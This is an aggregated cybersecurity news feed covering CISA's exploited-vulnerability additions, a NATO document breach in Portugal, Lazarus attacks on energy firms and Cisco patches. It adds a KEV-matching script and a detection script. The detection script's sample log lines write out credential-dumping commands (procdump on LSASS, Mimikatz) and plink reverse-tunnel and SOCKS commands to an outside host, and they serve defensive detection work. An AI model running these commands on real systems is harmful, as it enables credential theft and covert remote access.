The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 12 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including four vulnerabilities in D-Link routers, two Chrome zero-day issues, and a recently disclosed flaw in the QNAP Photo Station.

Under Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, Federal Civilian Executive Branch (FCEB) agencies must remediate the catalogued vulnerabilities by the due date to protect their networks against attacks exploiting them.

Experts also recommend that private organizations review the catalog and address the listed vulnerabilities in their own infrastructure.

The D-Link router vulnerabilities added to the catalog are:

  • CVE-2022-28958 D-Link DIR-816L Remote Code Execution Vulnerability
  • CVE-2022-26258 D-Link DIR-820L Remote Code Execution Vulnerability
  • CVE-2018-6530 D-Link Multiple Routers OS Command Injection Vulnerability
  • CVE-2011-4723 D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability

Last week, Google released emergency fixes for CVE-2022-3075, a Chrome vulnerability being exploited in the wild; CISA has now added this flaw to the catalog.

CISA also added CVE-2022-27593, affecting QNAP NAS appliances. This week the Taiwanese vendor warned customers of ongoing DeadBolt ransomware attacks exploiting a zero-day vulnerability in Photo Station.

CISA orders federal agencies to fix these vulnerabilities by September 29, 2022.
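BOD 22-01 turns the catalog into a deadline list, and the catalog is published as JSON, so the check is easy to automate. The Python below is an added example, not CISA tooling: it parses a catalog excerpt laid out with the field names of CISA’s public feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json), matches entries against a constructed asset inventory and computes days to the due date. The excerpt is abridged, the vulnerability names of the non-D-Link entries are paraphrased, and the inventory is constructed.

```python
"""Match a KEV catalog excerpt against an asset inventory and compute BOD
22-01 due dates.  Added example for this page, not CISA tooling.  The
excerpt uses the field names of CISA's public JSON feed, but its entries
are abridged and partly paraphrased; the inventory is constructed."""
import json
from datetime import date

KEV_EXCERPT = json.loads("""
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {"cveID": "CVE-2022-28958", "vendorProject": "D-Link", "product": "DIR-816L",
     "vulnerabilityName": "D-Link DIR-816L Remote Code Execution Vulnerability",
     "dateAdded": "2022-09-08", "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2022-09-29"},
    {"cveID": "CVE-2022-26258", "vendorProject": "D-Link", "product": "DIR-820L",
     "vulnerabilityName": "D-Link DIR-820L Remote Code Execution Vulnerability",
     "dateAdded": "2022-09-08", "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2022-09-29"},
    {"cveID": "CVE-2022-3075", "vendorProject": "Google", "product": "Chromium",
     "vulnerabilityName": "Google Chromium Insufficient Data Validation Vulnerability",
     "dateAdded": "2022-09-08", "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2022-09-29"},
    {"cveID": "CVE-2022-27593", "vendorProject": "QNAP", "product": "Photo Station",
     "vulnerabilityName": "QNAP Photo Station Externally Controlled Reference Vulnerability",
     "dateAdded": "2022-09-08", "requiredAction": "Apply updates per vendor instructions.",
     "dueDate": "2022-09-29"}
  ]
}
""")

# Constructed inventory: (vendor, product) pairs present in the estate.
INVENTORY = [("D-Link", "DIR-816L"), ("QNAP", "Photo Station"), ("Google", "Chromium")]


def due_items(catalog, inventory, today, horizon_days=30):
    """Catalog entries matching the inventory, annotated with days left to
    the BOD 22-01 due date, soonest (or most overdue) first.  `today` is an
    ISO date string so the caller can replay any point in time."""
    today = date.fromisoformat(today)
    wanted = {(v.lower(), p.lower()) for v, p in inventory}
    items = []
    for entry in catalog["vulnerabilities"]:
        key = (entry["vendorProject"].lower(), entry["product"].lower())
        if key not in wanted:
            continue
        days_left = (date.fromisoformat(entry["dueDate"]) - today).days
        if days_left > horizon_days:
            continue
        items.append({"cveID": entry["cveID"], "product": entry["product"],
                      "dueDate": entry["dueDate"], "days_left": days_left,
                      "overdue": days_left < 0})
    return sorted(items, key=lambda i: i["days_left"])


def summary(catalog, inventory, today):
    """Counts a ticket queue cares about: how many matched, how many overdue."""
    items = due_items(catalog, inventory, today, horizon_days=10**6)
    return {"matched": len(items), "overdue": sum(i["overdue"] for i in items)}


if __name__ == "__main__":
    for item in due_items(KEV_EXCERPT, INVENTORY, "2022-09-10"):
        state = "OVERDUE" if item["overdue"] else f"{item['days_left']} days left"
        print(f"{item['cveID']:16} {item['product']:14} due {item['dueDate']} ({state})")
    print(summary(KEV_EXCERPT, INVENTORY, "2022-09-10"))
```

Matching on vendor and product strings is deliberately loose; in practice the join key should be whatever your asset inventory records (CPE, or vendor plus model), and the catalog’s shortDescription and requiredAction fields go straight into the ticket.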

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

Classified NATO documents sold on darkweb after they were stolen from Portugal

Security Affairs - Thu, 09/08/2022 - 16:36
Threat actors claimed to have stolen classified NATO documents from the Armed Forces General Staff agency of Portugal (EMGFA).

The Armed Forces General Staff agency of Portugal (EMGFA) learned it had suffered a cyberattack after classified NATO documents belonging to the agency were found offered for sale on the dark web.

The Armed Forces General Staff (Portuguese: Estado-Maior-General das Forças Armadas), or EMGFA, is the supreme military body of Portugal. It is responsible for the planning, command and control of the Portuguese Armed Forces.

“The General Staff of the Armed Forces (EMGFA), commanded by the Chief of Staff, Admiral Silva Ribeiro, was the target of a “prolonged and unprecedented cyberattack” that resulted in the exfiltration of classified NATO documents.” reported the news outlet Diario de Noticias.

The newspaper’s sources consider the breach extremely serious: hundreds of Secret and Confidential documents sent by NATO to Portugal are for sale on the dark web.

“It was a cyberattack prolonged in time and undetectable, through bots programmed to detect this type of documents, which were later removed in several stages”, explained one of these sources.

The threat actors published samples of the stolen documents as proof of the hack.

The documents were spotted by U.S. intelligence services, which alerted the U.S. embassy in Lisbon, which in turn warned the Portuguese authorities.

“NATO will have demanded explanations and guarantees from the Portuguese government and, next week, on behalf of António Costa, they should travel to NATO headquarters, in Brussels, for a high-level meeting at the NATO Office of Security, the secretary of State for Digitization and Administrative Modernization, Mário Campolargo, who oversees the GNS, and the Director-General of this Office, Vice Admiral Gameiro Marques, who is responsible for the security of classified information sent to our country.” continues the report.

The National Security Office (GNS) and Portugal’s national cybersecurity center launched an investigation into the incident to determine the extent of the data breach.

According to the initial investigation, the documents were exfiltrated from systems at the EMGFA, at the military intelligence service (CISMIL) and at the General Directorate of National Defense Resources.

The investigators found that the rules for the transmission of classified documents had been broken: the threat actors were able to access the Integrated System of Military Communications (SICOM) and to receive and forward classified documents.

“The exchange of information between allies in terms of Information Security is permanent at the bilateral and multilateral levels. Whenever there is a suspicion of compromise of cybersecurity of Information System networks, the situation is extensively analyzed and all procedures aimed at enhancing cybersecurity awareness and the correct handling of information to deal with new types of threat are implemented. Disciplinary and/or criminal law automatically determines the adoption of appropriate procedures,” said the spokeswoman for Portuguese Prime Minister António Costa.


Pierluigi Paganini

(SecurityAffairs – hacking, NATO)

The post Classified NATO documents sold on darkweb after they were stolen from Portugal appeared first on Security Affairs.

Categories: Cyber Security News

New Vulnerabilities Reported in Baxter's Internet-Connected Infusion Pumps

The Hacker News - Thu, 09/08/2022 - 13:55
Multiple security vulnerabilities have been disclosed in Baxter's internet-connected infusion pumps used by healthcare professionals in clinical environments to dispense medication to patients. "Successful exploitation of these vulnerabilities could result in access to sensitive data and alteration of system configuration," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in
Categories: Cyber Security News

North Korea-linked Lazarus APT targets energy providers around the world

Security Affairs - Thu, 09/08/2022 - 11:12
North Korea-linked Lazarus APT group is targeting energy providers around the world, including organizations in the US, Canada, and Japan.

Talos researchers tracked a campaign, orchestrated by the North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. The campaign was observed between February and July 2022.

The attacks aimed to infiltrate organizations around the world, maintain long-term access and exfiltrate data from the victims.

“Targeted organizations include energy providers from around the world, including those headquartered in the United States, Canada and Japan.” reads the analysis published by Talos. “The campaign is meant to infiltrate organizations around the world for establishing long term access and subsequently exfiltrating data of interest to the adversary’s nation-state.”

The attack chain observed by the experts starts with the exploitation of known vulnerabilities (e.g. the Log4j vulnerability, Log4Shell) in VMware products to gain an initial foothold in enterprise networks. Once inside the network, the threat actors deployed custom implants tracked as VSingle and YamaBot.

VSingle is an HTTP bot that executes arbitrary code fetched from a remote network and can also download and execute plugins. It was used for a variety of malicious activities, including reconnaissance, deployment of additional malware, and data exfiltration. YamaBot is a backdoor written in Go.

The nation-state hackers also employed known malware families, along with a previously unknown implant that Talos calls “MagicRAT.”

“The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives.” continues the report.

The same campaign was partially documented by Symantec and AhnLab earlier this April and May.

Cisco Talos experts observed multiple attacks against several victims and detailed two of the most representative intrusions:

  • Victim 1: Illustrates the kill chain from exploitation to actions on objectives. This intrusion also illustrates the use of the VSingle implant.
  • Victim 2: Represents a kill chain similar to Victim 1 but in this instance, we observed the deployment of a new implant we’re calling “MagicRAT” along with VSingle.

While the infection chain is similar across the intrusions in this campaign, there were some key variations, consisting of optional activities the APT group conducted in different intrusion sets.

Below is the list of variations shared by Talos:

  • Credential harvesting using tools such as Mimikatz and Procdump.
  • Proxy tools to set up SOCKS proxies.
  • Reverse tunneling tools such as PuTTY’s plink.
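The three optional activities above (LSASS dumping with Procdump or Mimikatz, SOCKS proxy setup and plink reverse tunnels) all leave a process-creation trail, which is where a defender would look for them. The following detection heuristic is an added example, not code from Talos or from Security Affairs: it runs over constructed Windows process-creation events in an assumed `key=value` log format (a stand-in for Sysmon Event ID 1 or Windows 4688 records) and flags the command-line patterns that distinguish these tools, matching Procdump on its arguments rather than its file name because attackers routinely rename the binary.

```python
"""Heuristic detection of the Lazarus post-exploitation activity listed by
Talos: credential dumping (Procdump/Mimikatz), SOCKS proxies and plink
reverse tunnels. Added example; the log format and events are constructed."""
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional

# Constructed process-creation events (not real telemetry). Assumed format:
# <timestamp> host=<host> user=<user> image=<path> cmdline=<command line>
SAMPLE_EVENTS = [
    r"2022-05-03T10:12:07Z host=WS-ACCT-07 user=CORP\jdoe image=C:\Windows\System32\notepad.exe cmdline=notepad.exe C:\Users\jdoe\notes.txt",
    r"2022-05-03T10:14:51Z host=WS-ACCT-07 user=CORP\jdoe image=C:\Temp\pd.exe cmdline=pd.exe -accepteula -ma lsass.exe C:\Temp\l.dmp",
    r"2022-05-03T10:15:20Z host=WS-ACCT-07 user=CORP\jdoe image=C:\Temp\m.exe cmdline=m.exe privilege::debug sekurlsa::logonpasswords exit",
    r"2022-05-03T10:20:02Z host=SRV-HZN-01 user=SYSTEM image=C:\Tools\plink.exe cmdline=plink.exe -N -R 3389:127.0.0.1:3389 -pw x svc@203.0.113.5",
    r"2022-05-03T10:21:33Z host=SRV-HZN-01 user=SYSTEM image=C:\Tools\plink.exe cmdline=plink.exe -N -D 1080 svc@203.0.113.5",
    r"2022-05-03T11:02:10Z host=WS-DEV-12 user=CORP\asmith image=C:\Tools\plink.exe cmdline=plink.exe -N -L 8080:intranet.corp:80 asmith@bastion.corp",
]

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) image=(?P<image>\S+) cmdline=(?P<cmdline>.*)$"
)

SSH_CLIENTS = {"plink.exe", "ssh.exe"}


@dataclass(frozen=True)
class Alert:
    host: str
    technique: str
    cmdline: str


def parse_event(line: str) -> Optional[dict]:
    """Parse one log line into a dict; None if it does not match the format."""
    m = EVENT_RE.match(line)
    return m.groupdict() if m else None


# Each rule receives (image basename, original argv, lowercase command line).
def dumps_lsass(image: str, argv: List[str], cmd: str) -> bool:
    # Procdump full/mini dump flags pointed at lsass. Matched on the argument
    # shape, so a renamed procdump (pd.exe above) is still caught.
    dump_flags = {"-ma", "-mm", "-mp"}
    return "lsass" in cmd and (image.startswith("procdump") or any(a.lower() in dump_flags for a in argv))


def runs_mimikatz(image: str, argv: List[str], cmd: str) -> bool:
    # Module syntax (sekurlsa::, lsadump::) survives renaming the binary.
    return image == "mimikatz.exe" or re.search(r"\b(sekurlsa|lsadump|kerberos)::", cmd) is not None


def reverse_tunnel(image: str, argv: List[str], cmd: str) -> bool:
    # plink/ssh -R binds a port on the attacker's host and forwards it back
    # into the victim network (plink flags are case-sensitive, so argv is raw).
    return image in SSH_CLIENTS and "-R" in argv


def socks_proxy(image: str, argv: List[str], cmd: str) -> bool:
    # -D makes the SSH client a dynamic SOCKS proxy the operator pivots through.
    return image in SSH_CLIENTS and "-D" in argv


RULES: List[tuple] = [
    ("procdump_lsass_dump", dumps_lsass),
    ("mimikatz", runs_mimikatz),
    ("plink_reverse_tunnel", reverse_tunnel),
    ("ssh_socks_proxy", socks_proxy),
]


def scan(lines: Iterable[str]) -> List[Alert]:
    """Apply every rule to every parsable event and collect the hits in order."""
    alerts: List[Alert] = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        argv = ev["cmdline"].split()
        cmd = ev["cmdline"].lower()
        for name, rule in RULES:
            if rule(image, argv, cmd):
                alerts.append(Alert(ev["host"], name, ev["cmdline"]))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.host}: {a.technique}: {a.cmdline}")
```

Note that the benign `plink -L` local forward on WS-DEV-12 is deliberately not flagged: only `-R` (traffic from the attacker into the network) and `-D` (SOCKS pivot) match the tunneling behaviour Talos describes, which keeps the rule usable on hosts where administrators legitimately use plink.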


Pierluigi Paganini

(SecurityAffairs – hacking, Lazarus APT)

The post North Korea-linked Lazarus APT targets energy providers around the world appeared first on Security Affairs.

Categories: Cyber Security News

The government wants retailers to install 2 MSWiA apps by default on Poles' smartphones

Niebezpiecznik.pl - Thu, 09/08/2022 - 10:17
Threat warning systems are a very important element of how a state functions. Unfortunately, the government has just come up with an idea that may create many negative associations around the Regionalny System Ostrzegania (Regional Warning System), which is, after all, a useful system. Since yesterday, radio and television journalists have been asking us about these issues. We have therefore decided to write up our observations as an article, so that our position does not get diluted […]

North Korean Lazarus Hackers Targeting Energy Providers Around the World

The Hacker News - Thu, 09/08/2022 - 08:20
A malicious campaign mounted by the North Korea-linked Lazarus Group is targeting energy providers around the world, including those based in the United States, Canada, and Japan. “The campaign is meant to infiltrate organizations around the world for establishing long-term access and subsequently exfiltrating data of interest to the adversary’s nation-state,” Cisco Talos said in a report shared
Categories: Cyber Security News

Cisco will not fix the authentication bypass flaw in EoL routers

Security Affairs - Thu, 09/08/2022 - 07:24
Cisco released fixes for new security flaws affecting its products, including a recently disclosed high-severity issue in the NVIDIA Data Plane Development Kit (DPDK).

The most severe issues fixed by Cisco are an unauthenticated access to messaging services vulnerability affecting Cisco SD-WAN vManage software and a vulnerability in the NVIDIA Data Plane Development Kit (DPDK).

The two issues have been tracked as CVE-2022-20696 (CVSS score: 7.5) and CVE-2022-28199 (CVSS score: 8.6) respectively.

The CVE-2022-28199 flaw stems from a lack of proper error handling in DPDK’s network stack. An attacker can trigger the flaw to cause a denial-of-service (DoS) condition, potentially also affecting data integrity and confidentiality.

“If an error condition is observed on the device interface, the device may either reload or fail to receive traffic, resulting in a denial of service (DoS) condition.” reads the advisory published by Cisco.

The vulnerability affects:

  • Cisco Catalyst 8000V Edge Software
  • Adaptive Security Virtual Appliance (ASAv)
  • Secure Firewall Threat Defense Virtual (formerly FTDv)

The second issue resides in the binding configuration of Cisco SD-WAN vManage Software containers. An unauthenticated, adjacent attacker with access to the VPN0 logical network can exploit it to reach the messaging service ports on an affected system.

“A vulnerability in the binding configuration of Cisco SD-WAN vManage Software containers could allow an unauthenticated, adjacent attacker who has access to the VPN0 logical network to also access the messaging service ports on an affected system.” reads the advisory. “This vulnerability exists because the messaging server container ports on an affected system lack sufficient protection mechanisms. An attacker could exploit this vulnerability by connecting to the messaging service ports of the affected system. To exploit this vulnerability, the attacker must be able to send network traffic to interfaces within the VPN0 logical network. This network may be restricted to protect logical or physical adjacent networks, depending on device deployment configuration. A successful exploit could allow the attacker to view and inject messages into the messaging service, which can cause configuration changes or cause the system to reload.”

Cisco PSIRT is not aware of in-the-wild attacks exploiting either flaw.

Cisco also addressed a medium-severity issue, tracked as CVE-2022-20863 (CVSS score: 4.3), in the Cisco Webex App.

“A vulnerability in the messaging interface of Cisco Webex App, formerly Webex Teams, could allow an unauthenticated, remote attacker to manipulate links or other content within the messaging interface.” reads the advisory. “This vulnerability exists because the affected software does not properly handle character rendering. An attacker could exploit this vulnerability by sending messages within the application interface. A successful exploit could allow the attacker to modify the display of links or other content within the interface, potentially allowing the attacker to conduct phishing or spoofing attacks.”

The fourth issue addressed by the vendor is an authentication bypass flaw, tracked as CVE-2022-20923 (CVSS score: 4.0), that affects Cisco Small Business RV110W, RV130, RV130W, and RV215W routers.

The bad news for customers is that the company will not fix this flaw, because the affected routers have reached end-of-life (EOL).


Pierluigi Paganini

(SecurityAffairs – hacking, NVIDIA)

The post Cisco will not fix the authentication bypass flaw in EoL routers appeared first on Security Affairs.

Categories: Cyber Security News

Chinese Hackers Target Government Officials in Europe, South America and Middle East

The Hacker News - Thu, 09/08/2022 - 07:02
A Chinese hacking group has been attributed to a new campaign aimed at infecting government officials in Europe, the Middle East, and South America with a modular malware known as PlugX. Cybersecurity firm Secureworks said it identified the intrusions in June and July 2022, once again demonstrating the adversary's continued focus on espionage against governments around the world. "PlugX is
Categories: Cyber Security News
